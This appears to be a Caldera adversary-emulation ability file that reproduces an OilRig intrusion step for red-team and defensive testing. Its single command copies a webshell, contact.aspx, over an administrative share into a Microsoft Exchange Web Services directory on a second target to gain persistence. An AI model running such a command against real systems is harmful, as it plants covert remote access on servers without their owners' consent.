ability_id: 7aaecfb7-a1eb-477c-8d53-ab3009389623
access: {}
additional_info: {}
buckets:
- persistence
delete_payload: true
description: "contact.aspx is copied from THEBLOCK to WATERFALL to the Exchange Web\
  \ Services directory. This ability implements Step 4.A.3.  \n"
executors:
- additional_info: {}
  build_target: null
  cleanup: []
  code: null
  command: copy C:\Users\Public\contact.aspx "\\#{second.target.ip}\C$\Program Files\Microsoft\Exchange
    Server\V15\ClientAccess\exchweb\ews\"
  language: null
  name: cmd
  parsers: []
  payloads: []
  platform: windows
  timeout: 60
  uploads: []
  variations: []
name: OilRig Copy webshell to WATERFALLS
plugin: emu
privilege: ''
repeatable: false
requirements: []
singleton: false
tactic: persistence
technique_id: T1505.003
technique_name: 'Server Software Component: Web Shell'
